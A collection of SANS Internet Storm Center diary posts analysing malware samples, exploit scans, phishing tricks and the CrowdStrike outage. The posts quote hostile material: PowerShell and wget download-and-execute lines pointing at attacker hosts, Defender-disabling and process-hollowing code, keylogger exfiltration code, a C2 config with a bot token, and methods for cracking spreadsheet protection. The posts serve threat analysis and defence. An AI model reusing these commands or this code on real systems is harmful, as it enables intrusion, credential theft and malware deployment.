Some simple PowerShell scripts might deliver nasty content if executed by the target. I found a very simple one (with a low VT score of 8/65):

$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add("X-Requested-With", "PowerShell")
$script = $webclient.DownloadString("hxxp://147[.]45[.]159[.]206/open.ps1")
Invoke-Expression $script

The file "open.ps1" is downloaded from Russia and contains comments in Russian like "Function of real-life security protection". It will try to disable the antivirus or, if not possible, it will ask the victim to do it!

// Decoded: "Press d when u turn off Tamper Protect!"
$ready = Read-Host 
([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("UHJlc3MgZCB3aGVuIHUgdHVybiBvZmYgVGFtcGVyIFByb3RlY3Qh")))

if ($ready -eq "d") {
    Try {
        Set-MpPreference -DisableRealtimeMonitoring $true
        Write-Host "1"
    }
    Catch {
       Write-Host "2"
    }
}
else {
    // Decoded: "Canceled!"
    Write-Host ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q2FuY2VsZWQh")))
    exit
}

Then, the script tries to download two PE files:

• cmd.exe (SHA256: 97d6e2d922c2f69cb84341b238966555820f0b46375a9e0e1a1a19a5f42a8f96)
• service.exe (SHA256: de223760fd87d21d3548ab96e810f7c0c16aeea156905845d2e3c81e1e7df663)

"cmd.exe" is a self-extracting RAR archive:

remnux@remnux:MalwareZoo/20240726$ rar t cmd.exe 

RAR 5.50   Copyright (c) 1993-2017 Alexander Roshal   11 Aug 2017
Trial version             Type 'rar -?' for help

Testing archive cmd.exe

Testing     comCommon.exe                                             OK 
Testing     OejMizBn6qpQO.vbe                                         OK 
Testing     e0FFDTJuwoKvrdf9FE4ACLcGB7vDN5I0giWGmO2aDyI3QEuN.bat      OK 
All OK

It communicates with solararbx[.]online (%%ip:37.140.192.207%%). At this time, I'm not sure about the purpose of the RAR archive.

"service.exe" is the Exela[1] stealer, developed in Python and compiled into a PE file. It uses Discord as C2 channel. Reconnaissance is performed via a simple script:

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

[1] https://github.com/quicaxd/Exela-V2.0

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

XWorm is not a brand-new malware family[1]. It's a common RAT (Remote Access Tool) re-use regularly in new campaigns. Yesterday, I found a sample that behaves like a dropper and runs the malware using the Process Hollowing technique[2]. The sample is called "@Norman_is_back_RPE_v1.exe" (SHA256: dc406d626a9aac5bb918abf0799fa91ba6239fc426324fd8c063cc0fcb3b5428). It's a .Net executable that is, strangely, not obfuscated. It's possible to disassemble it with ilspycmd:

remnux@remnux:/MalwareZoo/20240723$ ilspycmd Norman_is_back_RPE_v1.exe >Norman_is_back_RPE_v1.exe.src

My next step in malware triage is to always have a look at potential chunks of Base64 data (which are pretty common):

remnux@remnux:/MalwareZoo/20240723$ base64dump.py Norman_is_back_RPE_v1.exe.src -n 50
ID  Size    Encoded          Decoded          md5 decoded                     
--  ----    -------          -------          -----------                     
 1:   50520 TVqQAAMAAAAEAAAA MZ.............. 642ad3e40b11c9623d3988f68818d7d5

The good news, the presence of "TVqQAA" reveals the presence of an embedded PE file[3]. Here is the corresponding line in the code:

RPE1.Program.Run("C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe", Convert.FromBase64String("TVqQAAMA ... AAAA=="), protect: false);

namespace RPE1
{
    internal static class Program
    {
        private delegate int DelegateResumeThread(IntPtr handle);
        private delegate bool DelegateWow64SetThreadMIC4ME(IntPtr thread, int[] MIC4ME);
        private delegate bool DelegateSetThreadMIC4ME(IntPtr thread, int[] MIC4ME);
        private delegate bool DelegateWow64GetThreadMIC4ME(IntPtr thread, int[] MIC4ME);
        private delegate bool DelegateGetThreadMIC4ME(IntPtr thread, int[] MIC4ME);
        private delegate int DelegateVirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
        private delegate bool DelegateWriteProcessMemory(IntPtr process, int BA4ME, byte[] buffer, int bufferSize, ref int bytesWritten);
        private delegate bool DelegateReadProcessMemory(IntPtr process, int BA4ME, ref int buffer, int bufferSize, ref int bytesRead);
        private delegate int DelegateZwUnmapViewOfSection(IntPtr process, int BA4ME);
        private delegate bool DCPA_1(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);

Do you see the "CPA_1"? The attacker obfuscated the reference to CreateProcess() behind this name.

Otherwise, we can see all the required API calls to perform Process Hollowing:

1. Create a process in suspended mode
2. Wipe its memory
3. Allocate new memory in the empty process
4. Write the malicious payload
5. Resume the process

Here is the beginning of the RPE1.Program.Run class:

public static void Run(string path, byte[] PL4ME, bool protect)
{
    for (int i = 0; i < 5; i++)
    {
        int bytesRead = 0;
        StartupInformation startupInfo = default(StartupInformation);
        ProcessInformation processInformation = default(ProcessInformation);
        startupInfo.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)));
        try
        {
            if (!CPA_1(path, string.Empty, IntPtr.Zero, IntPtr.Zero, inheritHandles: false, 134217732u, IntPtr.Zero, null, ref startupInfo, ref processInformation))
            {
                throw new Exception();
            }
            ...
            if (num2 == buffer && ZwUnmapViewOfSection(processInformation.ProcessHandle, buffer) != 0)
            {
                throw new Exception();
            }
            ...
            int num4 = VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64);
            ...

CreateProcess(), CPA_1 here, is used to create a new process with "path" being C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe). The second argument (PL4ME) contains the decoded Base64 data, the second stage. The result will be a process "aspnet_compiler.exe" that will contain and run the malware.

Let's have a look at this second stage:

remnux@remnux:/MalwareZoo/20240723$ base64dump.py -n 50 Norman_is_back_RPE_v1.exe.src -s 1 -d >secondstage.exe
remnux@remnux:/MalwareZoo/20240723$ file secondstage.exe 
secondstage.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

This PE file (SHA256: ccbdda883a1ab8170c280680e9f7af7e4001cec36f68773d0a9327991aaa0032). It uses the following C2 config:

{
    "c2": [
        "104[.]243[.]32[.]185:7000"
    ],
    "attr": {
        "telegram": "https://api[.]telegram[.]org/bot5112782641:AAEVhDgUqm4o4Ygqtq2_C3RuM_QdhcPC7is/sendMessage?chat_id=985608946",
        "install_file": "USB.exe"
    },
    "keys": [
        {
            "key": "aes_key",
            "kind": "aes.plain",
            "value": "9IvH+qReqJ212x6k9TOpTw=="
        }
    ],
    "rule": "Xworm",
    "mutex": [
        "nYYCvxHXYQfAQcPE"
    ],
    "family": "xworm",
    "version": "5.0"
}

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
[2] https://attack.mitre.org/techniques/T1055/012/
[3] https://isc.sans.edu/diary/Searching+for+Base64encoded+PE+Files/22199

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Keylogging is a pretty common feature of many malware families because recording the key pressed on a keyboard may reveal a lot of interesting information like usernames, passwords, etc. Back from SANSFIRE, I looked at my backlog of hunting results and found an interesting piece of Python malware. This one implements a keylogger and a screenshot grabber but also... a "mouse logger"! By mouse logger, I mean that it can collect activity generated by the user's mouse.

The attacker uses the classic Python module pyinput[1]:

from pynput import keyboard
from pynput.keyboard import Listener

Then, a listener is defined to capture mouse events:

with Listener(on_click=self.on_click, on_move=self.on_move, on_scroll=self.on_scroll) as mouse_listener:
    mouse_listener.join()

...

class KeyLogger:
    ...
    def on_move(self, x, y):
        current_move = logging.info("Mouse moved to {} {}".format(x, y))
        self.appendlog(current_move)        
    def on_click(self, x, y):
        current_click = logging.info("Mouse moved to {} {}".format(x, y))
        self.appendlog(current_click)        
    def on_scroll(self, x, y):
        current_scroll = logging.info("Mouse moved to {} {}".format(x, y))
        self.appendlog(current_scroll)

The listener appends messages to a log (including pressed keys) exfiltrated at regular intervals. The technique used by the attacker is interesting: Instead of using a classic compromised mailbox or a Gmail account, mailtrap.io[2] is used:

m += message
with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
    server.login(email, password)
    server.sendmail(sender, receiver, m)

The risk with this setup is that port 2525 won't be open on the victim's firewall.

Another interesting behavior: Once the script has started the listener, it deletes itself. This is possible because the Python interpreter will read the entire file and parses it to check for syntax errors. The parsed script is then compiled into bytecode (a low-level set of instructions specific to Python). The bytecode is executed by the Python virtual machine (PVM) and the original file is not required anymore.

try:
    pwd = os.path.abspath(os.getcwd())
    os.system("cd " + pwd)
    os.system("TASKKILL /F /IM " + os.path.basename(__file__))
    print('File was closed.')
    os.system("DEL " + os.path.basename(__file__))
except OSError:
    print('File is close.')

The sample looks to be in a testing phase because some information, like the credentials to use maildrop.io, was missing. 

The script has a VT score of 6/65 (SHA256: ce7204ccabe856c7b219ab26083f0ef4ca11e3f835b4ef3d191d2eacef06d798[3]).

[1] https://pypi.org/project/pynput/
[2] https://mailtrap.io
[3] https://www.virustotal.com/gui/file/ce7204ccabe856c7b219ab26083f0ef4ca11e3f835b4ef3d191d2eacef06d798

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

In April, an OS command injection vulnerability in various D-Link NAS devices was made public [1]. The vulnerability, %%CVE:2024-3273%% was exploited soon after it became public. Many of the affected devices are no longer supported.

We have seen different exploits following similar patterns:

/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=[base 64 encoded payload]

After the initial scans, we had two more "spikes" in scans for this vulnerability. The second one just started two days ago.

The latest set of scans uses this payload:

ZWNobwktZQlcXHg2NVxceDYzXFx4NjhcXHg2ZlxceDIwXFx4MjdcXHg3OFxceDc4XFx4NzhcXHg3OFxceDc4XFx4NjNcXHg2M1xceDYzXFx4NjNcXHg2M1xceDI3fHNo

This payload decodes to

echo    -e    \\x65\\x63\\x68\\x6f\\x20\\x27\\x78\\x78\\x78\\x78\\x78\\x63\\x63\\x63\\x63\\x63\\x27|sh

Encoding strings as hexadecimal with "echo -e" has been popular for a while and took off after Mirai started using it. In this case, the command to be executed is:

echo 'xxxxxccccc'|sh

The goal of this exploit is to find vulnerable machines. The "double obfuscation" is likely supposed to bypass some filters and better discriminate against honeypots. I have seen "non functional" exploits used to detect honeypots by attempting to fingerprint the error message returned. Maybe a pattern to add to our honeypots after lunch.

The single source (%%ip:192.227.190.158%%) scanning for this particular version of the exploit on July 19th has now switched to related scans for nas_sharing.cgi

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-3273

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Last Friday, after Crowdstrike released a bad sensor configuration update that caused widespread crashes of Windows systems. The most visible effects of these crashes appear to have been mitigated. I am sure many IT workers had to spend the weekend remediating the issue.

It is still early regarding the incident response part, but I would like to summarize some of the important facts we know and some lessons learned.

You are likely afected if the CrowdStrike sensor system retrieved updates between 0409 and 0527 UTC on Friday, July 19th. CrowdStrike allows users to configure a sensor update policy, which will delay the update of the sensor software. But the corrupt file was a configuration ("signature") update, not an update of the sensor itself. Configuration updates are always applied as soon as they are released. Customers do not have an option to delay these updates. Systems crashed because a kernel driver provided by CrowdStrike crashed as it read the malformed configuration file.

Since news of the incident broke, CrowdStrike has been updating and expanding its guidance. Your first stop should be Crowdstrikes "Remediation and Guidance Hub". It will link to all the resources CrowdStrike has to offer. Yesterday, CrowdStrike announced that they will soon offer a new, accelerated technique for recovery. As I write this, the new technique has not been published. CrowdStrike did provide a new dashboard to affected users to track systems affected by the update.

Microsoft developed a USB solution to simplify the process. To apply the update, systems must be booted from the USB key. However, Bitlocker-encrypted hosts may require a recovery key.

Bitlocker is the major hurdle to a speedy recovery for many affected organizations. Ben Watsons posted on LinkedIn that his organization came up with a way to use a barcode scanner to simplify entering the recovery keys. I do not believe that the related code to create the barcodes is public.

It should be noted that there are some reports of scammers taking advantage of the incident. I reported on Friday about some phishing attempts and domains registered to take advantage of the incident. So far, we have not received a sample of a phishing e-mail, just reports that they had been seen. These phishing and malware emails may affect organizations not directly affected by the CrowdStrike problem. The extensive news coverage, often called a "Windows Problem", may prompt users into installing malicious files.

If you are affected: Only use tools provided by trustworthy sources. Refer to CrowdStrike's advice for guidance, and be careful with advice from others (including me :) ). Do not make far-reaching infrastructure changes before the incident is completely understood, and plan any changes carefully. This isn't the time to "rip out" CrowdStrike without first carefully evaluating alternatives. It may take a few weeks for CrowdStrike to completely understand what happened. Resiliency isn't just about avoiding outages. A big part is how to deal with outages that may happen. If you are not in the midst of recovering from CrowdStrike, Think about how you would deal with all your Windows Server (or Workstations) going down. How would you continue operations? Do you know where your Bitlocker recovery keys are?

If you are interested in recent domains registered to take advantage of the incident: Try our API. For example:

https://isc.sans.edu/api/recentdomains/today/crowdstrike?json

Instead of "crowdstrike," you may use other keywords or replace 'today' with a date in YYYY-MM-DD format. A suspect domain registered today: crowdstrike-fix.zip.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Last night, endpoint security company Crowdstrike released an update that is causing widespread "blue screens of death" (BSOD) on Windows systems. Crowdstrike released an advisory, which is only available after logging into the Crowdstrike support platform. A brief public statement can be found here.

Crowdstrike now also published a detailed public document with tips to recover:

https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/

---

Update: Some reports we have seen indicate that there may be phishing emails circulating claiming to come from "Crowdstrike Support" or "Crowdstrike Security". I do not have any samples at this point, but attackers are likely leveraging the heavy media attention. Please be careful with any "patches" that may be delivered this way.

One domain possibly associated with these phishing attacks is : crowdfalcon-immed-update [ .] com

---

Linux and MacOS systems are not affected by this issue.

The quickest fix appears to boot the system into "Windows Safemode with Network". This way, Crowdstrike will not start, but the current version may be downloaded and applied, which will fix the issue. This "quick version" of the fix is not part of Crowdstrike's recommendations but may be worth a try if you have many systems to apply the fix to or if you need to talk a non-computer-savvy person through the procedure. Some users have reported that this will succeed.

Casimir Pulaski (@cybermactex) mentioned on X that a simple reboot sometimes works if the latest update was downloaded before the system crashed.

The support portal statement offers the following steps to get affected systems back into business:

CrowdStrike Engineering has identified a content deployment related to this issue and reverted those changes.

Workaround Steps:

1 - Boot Windows into Safe Mode or the Windows Recovery Environment

2 - Navigate to the C:\Windows\System32\drivers\CrowdStrike directory

3 - Locate the file matching “C-00000291*.sys”, and delete it.

4 - Boot the host normally.

For a Bitlocker-protected system, you will have to provide the recovery key to delete the file.

Virtual systems are easier to fix as you should be able to just shut them down, mount the virtual disk to the host or a different virtual system (Linux? ;-) ), and remove the file.

Outages caused by this issue are far-reaching, with users on X reporting issues with Airports, 911 systems, banks, and media outlets. Please be patient with companies/workers affected by the issue.

This isn't the first time that security software has caused system crashes. Frequently, these issues are due to false positives marking system files as malicious.
 

Recently registered domains that may be related to Crowdstrike:

"crowdstrikeclaim.com"
"crowdstrikedown.site"
"crowdstrikeoutage.info"
"crowdstrikeupdate.com"
"crowdstrokeme.me"
"fix-crowdstrike-apocalypse.com"
"fix-crowdstrike-bsod.com"
"microsoftcrowdstrike.com"
"crowdfalcon-immed-update.com"

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

[This is a Guest Diary by Michael Gallant, an ISC intern as part of the SANS.edu BACS program]

                                                                  
                                                                                                  Image generated by DALL-E [8]

Introduction

During my internship at the SANS Internet Storm Center, I was tasked with setting up a honeypot, an internet device intentionally vulnerable, to observe and analyze attack vectors. Among the numerous attacks recorded, one particular observation stood out: the AndroxGh0st malware. This threat targets Laravel web applications and poses major risks to sensitive data. In this post, I aim to share my experience and raise awareness about AndroxGh0st, detailing its exploitation methods and providing strategies to defend against it.

Understanding AndroxGh0st

AndroxGh0st is a Python-scripted malware designed to target .env files that contain sensitive information in web applications, specifically those using the Laravel framework. This malware is part of a botnet operation that primarily aims to steal credentials and abuse other functions such as vulnerability scanning, Simple Mail Transfer Protocol (SMTP), application programming interfaces (APIs), and web shell deployment [1][2].

What is Laravel?

Laravel is an open-source PHP web application development framework. It simplifies development with built-in database interaction, authentication, routing, sessions, and caching features. Laravel is popular for designing web applications such as e-commerce platforms, social networking platforms, APIs (Application Programming Interfaces), and Content Management Systems (CMS). Laravel applications often handle critical data, making them attractive targets for attackers. The added complexity of Laravel can lead to security oversights, providing opportunities for exploitation and including exposed default settings or sensitive files, making it easier for attackers to gain access [3].

                                                                                           Key Characteristics [6]
                                             

AndroxGh0st exploits multiple known vulnerabilities:

CVE-2017-9841: A Remote Code Execution (RCE) vulnerability in PHPUnit.

• AndroxGh0st malware typically uses scripts to scan for and exploit specific vulnerabilities on websites. One common method is to run PHP code on vulnerable websites using the PHPUnit module. If the /vendor folder is accessible from the internet, attackers can send malicious HTTP POST requests to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php uniform resource identifier (URI), allowing them to execute code remotely.
• Once inside, attackers use AndroxGh0st to download malicious files to the compromised system. They can also set up fake web pages to maintain backdoor access, enabling them to download more malicious files and access databases.

CVE-2018-15133: The Laravel App Key Deserialization RCE.

• AndroxGh0st malware creates a botnet to scan for websites using the Laravel framework. It looks for exposed .env files at the root level of the domain, which often contain credentials and tokens. Attackers target these files to steal sensitive information.
• If an .env file is found, attackers send a GET request to /.env to access its contents. However, they might use a POST request with a specific identifier to the same URI. This method is often used on websites in debug mode, exposing non-production sites to the internet. Successful responses allow attackers to steal usernames, passwords, and credentials for services like email and AWS accounts.
• Also, AndroxGh0st can exploit the Laravel application key. If the key is found, attackers encrypt the PHP code and send it as a value in the XSRF-TOKEN cookie in a GET request. This exploit allows remote code execution on Laravel applications, allowing attackers to upload files and gain further access to the website

CVE-2021-41773: A directory traversal and RCE vulnerability in the Apache HTTP server.

• AndroxGh0st attackers scan for vulnerable Apache HTTP Servers (2.4.49 and 2.4.50). They use path traversal attacks to find uniform resource locators (URLs) for files outside the root directory. If these files aren't protected and Common Gateway Interface (CGI) scripts are enabled, attackers can execute code remotely.
• Once attackers obtain credentials through these methods, they can access sensitive data or use the services for further malicious activities. For example, if they compromise AWS credentials, they might create new users and policies or launch new AWS instances to conduct additional scans [1][3][4].

My interaction with AndroxGh0st

On March 11, 2024, I observed suspicious activities originating from IP address 78.153.140.179. The attacker made 191 connections to my honeypot, targeting TCP port 80 from various source ports and enacting the same HTTP requests. The user-agent string ‘androxgh0st’ was present in these connections, almost like a calling card left behind by the attacker.

                                                                               Sample of the HTTP connections made to TCP/80:
                     

                                                       Sample of sequences with HTTP Requests and different source ports:
                                      

Noting the threat actor’s user-agent string and the “androxgh0st” from all POST requests:

Although my honeypot didn't have an exposed .env file or other specific targets the malware was searching for, the meticulous behavior of AndroxGh0st was evident. Taking an account for the URIs after the successful connections and the incoming POST requests consistently included the "androxgh0st" string, demonstrating the malware's systematic approach to identifying vulnerable Laravel applications.

Am I Being Haunted by AndroxGh0st?

When detecting AndroxGh0st on our systems, we need to be aware of the various indicators of compromise. Provided by CISA/FBI, Juniper Labs, and Lacework Labs, here are some signs that this malware may haunt your system [1][5][7]:

Incoming GET and POST requests to the following URIs:

• /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /.env

Incoming POST requests with the following strings:

• [0x%5B%5D=androxgh0st]
• ImmutableMultiDict([(‘0x[]’, ‘androxgh0st’)])

URIs that were observed and used by the threat actors for credential exfiltration:

                                                       An example of attempted credential exfiltration through honeypot:

                                                                        An example of attempted web-shell drop through honeypot:

File Samples:

• AndroxGh0st python sample f6f240dc2d32bfd83b49025382dc0a1cf86dba587018de4cd96df16197f05d88 
• AndroxGh0st python sample 3b04f3ae4796d77e5a458fe702612228b773bbdefbb64f20d52c574790b5c81a
• Linux Miner dropped 23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066 
• Linux Miner dropped 6b5846f32d8009e6b54743d6f817f0c3519be6f370a0917bf455d3d114820bbc
• Linux Miner dropped bb7070cbede294963328119d1145546c2e26709c5cea1d876d234b991682c0b7
• PHP Webshell ca45a14d0e88e4aa408a6ac2ee3012bf9994b16b74e3c66b588c7eabaaec4d72 
• PHP Webshell 0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef

Other monikers used instead of AndroxGh0st:

Mitigations: How to Scare Away AndroxGh0st

Protecting your systems from AndroxGh0st requires a broad approach to security. Here are key recommendations to help network defenders reduce the risk and defend against this persistent malware:

Keep Systems Updated

• Regular Updates: Ensure all operating systems, software, and firmware are up to date and verify that Apache servers are not running vulnerable versions 2.4.49 or 2.4.50.
• Prioritize Patching: Focus on patching known exploited vulnerabilities in internet-facing systems, including CVE-2017-9841, CVE-2018-15133, and CVE-2021-41773.

Secure Configurations

• Default Deny Policy: Verify that the default configuration for all URIs is to deny all requests unless required.
• Disable Debug Mode: Ensure that Laravel applications are not in debug or testing mode, which can expose sensitive information.

Manage Credentials

• Remove Cloud Credentials: Remove all cloud credentials from .env files and revoke them. Use safer methods provided by cloud providers for temporary, frequently rotated credentials.
• Review Credential Usage: Conduct a review of previously stored cloud credentials and ongoing reviews for other credentials listed in the .env file. Check for unauthorized access or use on platforms or services associated with these credentials.
• Encrypt Sensitive Information: Encrypt sensitive information like API keys and credentials, especially in files like .env.
• Enhance Account Security: Implement multi-factor authentication (MFA) to enhance account security.

Network Security Measures

• Intrusion Detection Systems (IDS): Implement robust network security measures, including IDS, to detect and block malicious activities.
• Firewalls: Use firewalls to monitor and control incoming and outgoing network traffic based on predetermined security rules.

Scan for Malicious Files

• File System Scans: Regularly scan the server's file system for unknown PHP files, specifically in the root directory or /vendor/phpunit/phpunit/src/Util/PHP folder.
• Monitor Outgoing Requests: Examine outgoing GET requests to file-hosting sites such as GitHub, Pastebin, etc., especially when accessing a .php file.

By implementing these efforts, organizations can greatly reduce the risk of AndroxGh0st infections and improve their overall security posture [1][3].

Conclusion

                                          
                                                                                     Image generated by DALL-E [8]

This post has been enlightening and educational, shining a light on the now less frightening AndroxGh0st malware. While at the SANS Internet Storm Center, encountering and analyzing this malware was challenging and informative. Understanding its methods and implementing robust security measures are crucial in defending against such threats.

By staying alert, regularly updating systems, securing configurations, and managing credentials effectively, we can greatly reduce the risk posed by AndroxGh0st. Remember, being proactive and prepared is our best defense.

Thank you for joining me on this journey. Take care and keep your systems secure!

[1] https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a
[2] https://www.bleepingcomputer.com/news/security/fbi-androxgh0st-malware-botnet-steals-aws-microsoft-credentials/
[3] https://blogs.juniper.net/en-us/security/shielding-networks-against-androxgh0st
[4] https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys
[5] https://github.com/Juniper-ThreatLabs/IoC/blob/main/AndroxGhost%20Indicators.txt
[6] https://thehackernews.com/2024/03/androxgh0st-malware-targets-laravel.html
[7] https://github.com/lacework/lacework-labs/blob/master/blog/androxgh0st_IOCs.csv
[8] https://openai.com/index/dall-e-2/
[9] https://www.sans.edu/cyber-security-programs/bachelors-degree/
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Few weeks ago, I was asked by a customer to take a look at a phishing message which contained a link that one of their employees clicked on. The concern was whether the linked-to site was only a generic credential stealing web page or something targeted/potentially more dangerous. Luckily, it was only a run-of-the-mill phishing kit login page, nevertheless, the e-mail message itself turned out to be somewhat more interesting, since although it didn’t look like anything special, it did make it to the recipient’s inbox, instead of the e-mail quarantine where it should have ended up.

The reason for this probably was that the message in question contained what looked like a reply to a previous e-mail exchange. This might have made it appear more trustworthy to the spam/phishing detection mechanisms that were employed to scan it, since – as far as my understanding goes – automated spam/phishing detection mechanisms tend to consider messages with reply-chains to be somewhat more trustworthy than plain, unsolicited e-mails from unknown senders.

It should be mentioned that threat actors commonly use replies to legitimate messages in account takeover/BEC-style phishing attacks, however, in this case, the situation was somewhat different – the original (replied-to) message was from someone not associated with the targeted organization in any way. Use of this approach (i.e., “replying” to a message with no relevance to the recipient) can sometimes be seen in generic phishing, however, if someone receives an e-mail which contains a reply to a message from someone they have never even heard of, it doesn’t exactly make the message appear trustworthy… Which is where the slight twist, which was used in this message, comes in.

In the message, the ”reply” part was hidden from the recipient bellow a long list of empty paragraphs (well, paragraphs containing a non-breaking space). And although this technique is not new, since the aforementioned customer’s IT specialists weren’t aware of it, and a quick Google search failed to provide any write-ups of it, I thought it might be worthwhile to go over it here.

As the following example from my “phishing collection” shows, at first glance, an e-mail messages, in which this technique is used, would look quite normal, and a recipient might not notice anything suspicious (besides the overall “this is an obvious phishing” vibe).

Only if one noticed that the scrollbar on the right side of the window seems to indicate that there is (literally) much more to the message than it appears to be, would one probably discover the text of the original reply-chain... Which, in this instance, is hidden bellow 119 empty paragraphs.

Although the aforementioned technique is hardly the most common (or most dangerous) one when it comes to phishing, since it is being used “in the wild”, a short mention of it might make a good addition to any security awareness training (e.g., something along the lines of “if you see a large scrollbar next to the body of a short e-mail, it is a definite indicator that something is amiss”)…

-----------
Jan Kopriva
@jk0pr | LinkedIn
Nettles Consulting

I was asked a question about the protection of an .xlsm spreadsheet. I've written before on the protection of .xls spreadsheets, for example in diary entries "Unprotecting Malicious Documents For Inspection" and "16-bit Hash Collisions in .xls Spreadsheets"; and blog post "Quickpost: oledump.py plugin_biff.py: Remove Sheet Protection From Spreadsheets".

.xlsm spreadsheats (and .xlsx) are OOXML files, and are thus ZIP files containing mostly XML files:

The spreadsheet I'm taking as an example here, has a protected sheet. Let's take a look at the XML file for this sheet by piping zipdump.py's output into xmldump.py:

XML element sheetProtection protects this sheet. If you remove this element, the sheet becomes unprotected.

The password used to protect this sheet, is hashed and the hashvalue is stored as an attribute of element sheetProtection.

Let's print out each attribute on a different line:

The password is hashed hundred thousand times (attribute spinCount) with SHA-512 (attribute algorithmName) together with a salt (attribute saltValue, base64 encoded). This result is stored in attribute hashValue (base64 encoded).

Here is the algorithm in Python:

def CalculateHash(password, salt):
    passwordBytes = password.encode('utf16')[2:]
    buffer = salt + passwordBytes
    hash = hashlib.sha512(buffer).digest()
    for iter in range(100000):
        buffer = hash + struct.pack('<I', iter)
        hash = hashlib.sha512(buffer).digest()
    return hash

def Verify(password, salt, hash):
    hashBytes = binascii.a2b_base64(hash)
    return hashBytes == CalculateHash(password, binascii.a2b_base64(salt))

Spreadsheet protected-all.xlsx is a spreadsheet I created with 3 types of protections: modification protection, workbook protection and sheet protection:

I released a new version of xmldump.py to extract these hashes and format them for hashcat:

For each extracted hash, the lines are:

1. the name of the containing file
2. the name of the protecting element (which can be removed should you want to disable that particular protection)
3. the hashcat compatibel hash (hash mode 25300)
4. a hashcat command to crack this hash with a wordlist

You can imagine that cracking these hashes with hashcat is rather slow, because 100,000 SHA-256 hash operations need to be executed for each candidate password. On a desktop with a NVIDIA GeForce RTX 3080 GPU, I got around 24,000 hashes per second.

Didier Stevens
Senior handler
blog.DidierStevens.com

Wireshark release 4.2.6 fixes 1 vulnerability (SPRT parser crash) and 10 bugs.

Didier Stevens

Senior handler
blog.DidierStevens.com

A couple years ago, in diary entry "Unprotecting Malicious Documents For Inspection" I explain how .xls spreadsheets are password protected (but not encrypted). And in follow-up diary entry "Maldocs: Protection Passwords", I talk about an update to my oledump plugin plugin_biff.py to crack these passwords using password lists (by default, an embedded password list is used that is taken from the 2011 public-domain default password list used by John The Ripper).

Since the hashing algorithm used for the protection of .xls files produces a 16-bit integer with its highest bit set, there are 32768 (0x8000) possible hash values (called verifier), and thus ample chance to generate hash collisions.

I generated such a list, and included it in an update of my oledump plugin plugin_biff.py:

I took care to generate passwords prioritizing letters and digits over special characters.

Here is an example of a .xls workbook with a protected sheet. The protection password I used for this sheet is azeqsdwxc, a weak password that is not in the embedded list. Thus this password is not found in the password list when plugin plugin_biff.py attempts to crack it:

With previous versions of plugin plugin_biff.py, the report would state that the password was not cracked. But in this new version, when a password can not be cracked with the embedded or provided password list, the password is taken from the embedded verifier table. In this case, that password is bbbbhz (the verifier is 0xd9b1).

This means that both password azeqsdwxc and bbbbhz hash to the same value: verifier 0xd9b1.

And thus that the sheet can also be unprotected with password bbbbhz too:

So with this new version of oledump plugin plugin_biff.py, a password will always be provided for protected .xls files, whatever the value of the verifier.

Of course, this is only useful if you don't want or can't alter the sheet to remove the protection. Since these passwords just offer protection, and are not actually used to encrypt, it's possible to remove the protection without knowing the password, as I explained in my blog post "Quickpost: oledump.py plugin_biff.py: Remove Sheet Protection From Spreadsheets".

Didier Stevens
Senior handler
blog.DidierStevens.com

Today, I noticed some exploit attempts against an older vulnerability in the "Nette Framework", CVE-2020-15227 [1].

Nette is a PHP framework that simplifies the development of web applications in PHP. In 2020, an OS command injection vulnerability was found and patched in Nette. As so often with OS command injection, exploitation was rather straightforward. An exploit was released soon after.

Today, I noticed yet another variation of an exploit vor CVE-2020-15227:

 /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://199.204.98.254/ohshit.sh;chmod%20777%20ohshit.sh;./ohshit.sh

Even though the exploit is old, and the line above loads a simple DDoS agent, the agent itself has not been uploaded to Virustotal yet [2]. 

